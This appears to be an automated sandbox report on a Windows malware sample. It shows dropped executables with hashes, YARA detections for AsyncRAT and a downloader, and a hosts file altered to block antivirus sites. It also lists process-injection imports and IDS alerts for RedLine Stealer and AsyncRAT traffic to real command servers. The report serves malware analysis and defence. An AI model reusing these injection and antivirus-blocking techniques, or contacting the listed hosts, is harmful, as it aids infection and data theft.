SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	5.555815017949639
Encrypted:	false
SSDEEP:	768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
MD5:	C709136E78750FEB6CB85F99EDA16629
SHA1:	FC92BE55DCE55098824E381EDEC2002287BB8042
SHA-256:	D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
SHA-512:	7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...VrN%.p~....(o....#....s...

C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	5.990664364126582
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
MD5:	839B3EFD5782B6FC122855665F3AA202
SHA1:	067C1B809106A1B9AD1641A9C745D4B83ECE1196
SHA-256:	91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
SHA-512:	1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\{B955B2CC07A01546086603}.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	5.990664364126582
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
MD5:	839B3EFD5782B6FC122855665F3AA202
SHA1:	067C1B809106A1B9AD1641A9C745D4B83ECE1196
SHA-256:	91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
SHA-512:	1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\{B955B2CC07A01546086603}.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Windows\System32\relog.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	4.711832601225753
Encrypted:	false
SSDEEP:	24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtU70cfC/fop+w+H+J+7y:vDZhyoZWM9rU5fFcNDTmkT
MD5:	9B0756E93EDDEEC56435747A840F3F40
SHA1:	2738B410009DD29E723FEA0D2C141BB023948EB2
SHA-256:	81B6BEA3907109FA32EF9AB2664EC81174B334B8B125AEAD1952A1603A4CD413
SHA-512:	59D417DC4EAC5F2D995DFEFFB21C0C2F29BE5A2229407B12C1CF5F315A7CC6685BF2C2ADFC6F5A1965540F9B85D883282BCD32F5AD76F84B504CFDE8C9E68EE8
Malicious:	true
Reputation:	unknown
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 www.malwarebytes.com...0.0.0.0 en.malwarebytes.com...0.0.0.0 fr.malwarebytes.com...0.0.0.0 es.malwarebytes.com...0.0.0.0 www.avast.com...0.0.0.0 www.avg.com...0.0.0.0 w

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Reputation:	unknown
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.9175376660436045
TrID:	Win64 Executable GUI Net Framework (217006/5) 43.44% Win64 Executable GUI (202006/5) 40.43% InstallShield setup (43055/19) 8.62% Win64 Executable (generic) Net Framework (21505/4) 4.30% Win64 Executable (generic) (12005/4) 2.40%
File name:	xj40xovMsm.exe
File size:	15'088'640 bytes
MD5:	1082572a44d4c41214a3c38dcd8289f9
SHA1:	d1e83fbdc0bfaa92334eb043e3f37bbe1104cd68
SHA256:	9085e6327177bb47cf43a8d8ed0c24fcfd50cde4199c5130f2b97b2508e9aabc
SHA512:	364bea1a64fa1b0248692ac6239a10f4a38d52a93dcc71502220804061a3c0a2e6d4e0dce45a563e372829998c9cf3a2f44a6c047ec830e9a26eef3510b014d2
SSDEEP:	393216:iXMxStQvFIeTiQvMipcK5x00D1lR/ggb/Dt:oXU1TzvMInx0QV/D
TLSH:	07E6335EFA608A93E99D4238FC21F3B70B753CF45A72D696F95079DE6D32201CD28212
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...U...T.&.....T.&.....T.D.....T..c....T..c....T..c....T..`....T..`....T.......T..`....T.Rich..T................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14000f0d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6683160A [Mon Jul 1 20:48:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	1c99c85c193e659c86109d62f2b36c67

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FBA6D1D6BD0h
dec eax
add esp, 28h
jmp 00007FBA6D1CF827h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
mov eax, ecx
dec eax
neg ecx
dec eax
test eax, 00000007h
je 00007FBA6D1CF9C1h
nop
mov dl, byte ptr [eax]
dec eax
inc eax
test dl, dl
je 00007FBA6D1CFA11h
test al, 07h
jne 00007FBA6D1CF9A5h
dec ecx
mov eax, FEFEFEFFh

Rich Headers

Programming Language:

[RES] VS2012 build 50727
[LNK] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33ac4	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x588	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x3a000	0x1e00	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3d000	0x704	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2f3b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x26000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x249fe	0x24a00	874ca7ad685328491f9fabeeba3b0477	False	0.5484681633959044	zlib compressed data	6.417629028323008	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0xec10	0xee00	69b037775cf70c2bed5f6bb83d8d9437	False	0.31895023634453784	COM executable for DOS	4.411128745473268	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x35000	0x4e80	0x2600	695705f70e2858afb8a9c6ef91adedbf	False	0.23653371710526316	data	3.3127629656102306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x3a000	0x1e00	0x1e00	b8fd82356bacb7ba5fe4683194ff124e	False	0.49609375	data	5.420593750389663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x588	0x600	1772f848c8df08f17aae9811a440341a	False	0.419921875	data	4.159643852819197	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3d000	0x1bf8	0x1c00	ddc909fc27a64e99e4dd979a17a576f8	False	0.15457589285714285	data	2.06822605094356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3c0a0	0x2c0	data	English	United States	0.4502840909090909
RT_MANIFEST	0x3c360	0x224	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminators	English	United States	0.531021897810219

Imports

DLL	Import
SHLWAPI.dll	PathFindFileNameW
ADVAPI32.dll	OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCloseKey, RegSetValueExW, GetTokenInformation
USER32.dll	wsprintfW, wsprintfA
ole32.dll	CoInitialize, CoUninitialize, CoCreateInstance
OLEAUT32.dll	VariantClear
ntdll.dll	RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, NtWriteFile, RtlPcToFileHeader, RtlInitUnicodeString, NtSetInformationFile, NtClose, NtOpenFile, NtCreateSection, RtlAdjustPrivilege, NtSetInformationProcess, RtlVirtualUnwind, NtMapViewOfSection
WININET.dll	InternetCloseHandle, InternetReadFile, InternetOpenUrlW, HttpQueryInfoA, InternetOpenW
SHELL32.dll	SHGetFolderPathW, SHGetFolderPathA
KERNEL32.dll	LoadLibraryW, SetEndOfFile, InitializeCriticalSectionEx, WriteConsoleW, SetStdHandle, ReadConsoleW, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetLocaleInfoEx, OutputDebugStringW, HeapReAlloc, LoadLibraryExW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount64, QueryPerformanceCounter, GetModuleHandleW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStringTypeW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetFilePointerEx, ReadFile, GetStartupInfoW, InitOnceExecuteOnce, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetFileType, GetCurrentThreadId, SetLastError, GetThreadContext, SetThreadContext, Wow64SetThreadContext, WriteProcessMemory, Wow64GetThreadContext, GetCurrentProcess, Process32First, WaitForSingleObject, CreateRemoteThread, OpenProcess, GetProcAddress, VirtualAllocEx, Process32Next, GetModuleHandleA, CreateToolhelp32Snapshot, CloseHandle, CreateDirectoryW, CopyFileW, GetModuleFileNameW, GetLastError, SetFileAttributesW, VirtualProtectEx, GetFileSize, SetFilePointer, WriteFile, DuplicateHandle, CreateThread, LoadLibraryA, GetSystemDirectoryW, GetTempFileNameW, CreateFileW, GetTempPathW, ResumeThread, ExitProcess, FindFirstFileW, HeapAlloc, GetProcessHeap, GetWindowsDirectoryA, GetVolumeInformationA, Sleep, TerminateProcess, lstrcatA, CreateDirectoryA, CopyFileA, SetFileAttributesA, FindClose, Process32FirstW, GetModuleFileNameA, Process32NextW, CreateMutexA, FindNextFileW, LocalFree, MapViewOfFile, UnmapViewOfFile, VirtualFree, VirtualAlloc, CreateFileMappingA, ExpandEnvironmentStringsW, EncodePointer, DecodePointer, HeapFree, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetCommandLineW, GetModuleHandleExW, MultiByteToWideChar, HeapSize, GetStdHandle, RaiseException, IsValidCodePage, GetACP, GetOEMCP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/06/24-13:27:23.876923	TCP	2019714	ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile	49762	80	192.168.2.4	192.3.140.185
07/06/24-13:28:20.702090	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49847	80	192.168.2.4	188.114.96.3
07/06/24-13:29:11.211434	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49945	80	192.168.2.4	188.114.96.3
07/06/24-13:29:05.900230	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49936	80	192.168.2.4	188.114.96.3
07/06/24-13:28:23.914512	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49850	80	192.168.2.4	188.114.96.3
07/06/24-13:27:27.885798	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49770	80	192.168.2.4	188.114.96.3
07/06/24-13:28:10.743030	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49829	80	192.168.2.4	188.114.96.3
07/06/24-13:27:53.289576	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49804	80	192.168.2.4	188.114.96.3
07/06/24-13:29:02.431241	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49927	80	192.168.2.4	188.114.96.3
07/06/24-13:27:24.902744	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49764	80	192.168.2.4	192.3.140.185
07/06/24-13:27:36.852023	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49785	80	192.168.2.4	188.114.96.3
07/06/24-13:29:20.361652	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49954	80	192.168.2.4	188.114.96.3
07/06/24-13:28:27.540890	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49856	80	192.168.2.4	188.114.96.3
07/06/24-13:28:28.461699	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49860	80	192.168.2.4	188.114.96.3
07/06/24-13:29:21.262339	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49955	80	192.168.2.4	188.114.96.3
07/06/24-13:27:32.251129	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49779	1912	192.168.2.4	94.232.249.204
07/06/24-13:28:21.524237	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49848	80	192.168.2.4	188.114.96.3
07/06/24-13:28:51.211391	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49909	80	192.168.2.4	188.114.96.3
07/06/24-13:27:16.324762	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49742	80	192.168.2.4	64.31.40.18
07/06/24-13:28:26.543923	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49855	80	192.168.2.4	188.114.96.3
07/06/24-13:28:50.321115	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49908	80	192.168.2.4	188.114.96.3
07/06/24-13:28:39.235519	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49884	80	192.168.2.4	188.114.96.3
07/06/24-13:27:26.055756	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49766	80	192.168.2.4	188.114.96.3
07/06/24-13:28:58.992696	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49921	80	192.168.2.4	188.114.96.3
07/06/24-13:27:59.602954	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49814	80	192.168.2.4	188.114.96.3
07/06/24-13:27:16.854096	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49745	80	192.168.2.4	192.3.140.185
07/06/24-13:29:10.180094	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49944	80	192.168.2.4	188.114.96.3
07/06/24-13:27:45.171914	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49795	80	192.168.2.4	188.114.96.3
07/06/24-13:27:23.256466	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49760	80	192.168.2.4	75.119.203.100
07/06/24-13:28:01.558139	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49815	80	192.168.2.4	188.114.96.3
07/06/24-13:28:58.182973	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49919	80	192.168.2.4	188.114.96.3
07/06/24-13:28:33.931746	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49873	80	192.168.2.4	188.114.96.3
07/06/24-13:28:06.260273	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49821	80	192.168.2.4	188.114.96.3
07/06/24-13:28:32.180435	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49870	80	192.168.2.4	188.114.96.3
07/06/24-13:27:58.758426	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49812	80	192.168.2.4	188.114.96.3
07/06/24-13:27:32.392018	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49781	80	192.168.2.4	188.114.96.3
07/06/24-13:27:40.242398	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49790	80	192.168.2.4	188.114.96.3
07/06/24-13:27:30.555667	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49775	80	192.168.2.4	188.114.96.3
07/06/24-13:28:46.868285	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49901	80	192.168.2.4	188.114.96.3
07/06/24-13:27:31.385483	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49778	80	192.168.2.4	188.114.96.3
07/06/24-13:29:22.166191	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49956	80	192.168.2.4	188.114.96.3
07/06/24-13:27:34.995620	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49784	80	192.168.2.4	188.114.96.3
07/06/24-13:27:26.898974	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49769	80	192.168.2.4	188.114.96.3
07/06/24-13:28:15.166063	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49839	80	192.168.2.4	188.114.96.3
07/06/24-13:28:31.071363	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49867	80	192.168.2.4	188.114.96.3
07/06/24-13:28:18.885768	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49845	80	192.168.2.4	188.114.96.3
07/06/24-13:28:14.320671	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49836	80	192.168.2.4	188.114.96.3
07/06/24-13:28:17.072931	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49842	80	192.168.2.4	188.114.96.3
07/06/24-13:29:07.617738	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49940	80	192.168.2.4	188.114.96.3
07/06/24-13:27:49.444587	TCP	2035595	ET TROJAN Generic AsyncRAT Style SSL Cert	7707	49797	94.232.249.204	192.168.2.4
07/06/24-13:27:55.258520	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49806	80	192.168.2.4	188.114.96.3
07/06/24-13:29:01.617854	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49925	80	192.168.2.4	188.114.96.3
07/06/24-13:28:47.745851	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49904	80	192.168.2.4	188.114.96.3
07/06/24-13:27:49.884185	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49799	80	192.168.2.4	188.114.96.3
07/06/24-13:27:18.962369	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49750	80	192.168.2.4	192.3.140.185
07/06/24-13:27:21.298450	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49753	80	192.168.2.4	192.3.140.185
07/06/24-13:28:48.614243	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49906	80	192.168.2.4	188.114.96.3
07/06/24-13:27:55.513329	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49779	1912	192.168.2.4	94.232.249.204
07/06/24-13:28:24.804114	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49851	80	192.168.2.4	188.114.96.3
07/06/24-13:29:00.774225	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49923	80	192.168.2.4	188.114.96.3
07/06/24-13:28:16.102128	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49840	80	192.168.2.4	188.114.96.3
07/06/24-13:27:18.009499	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49747	80	192.168.2.4	192.3.140.185
07/06/24-13:28:03.274020	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49817	80	192.168.2.4	188.114.96.3
07/06/24-13:28:40.168982	TCP	2054071	ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3	49886	80	192.168.2.4	188.114.96.3
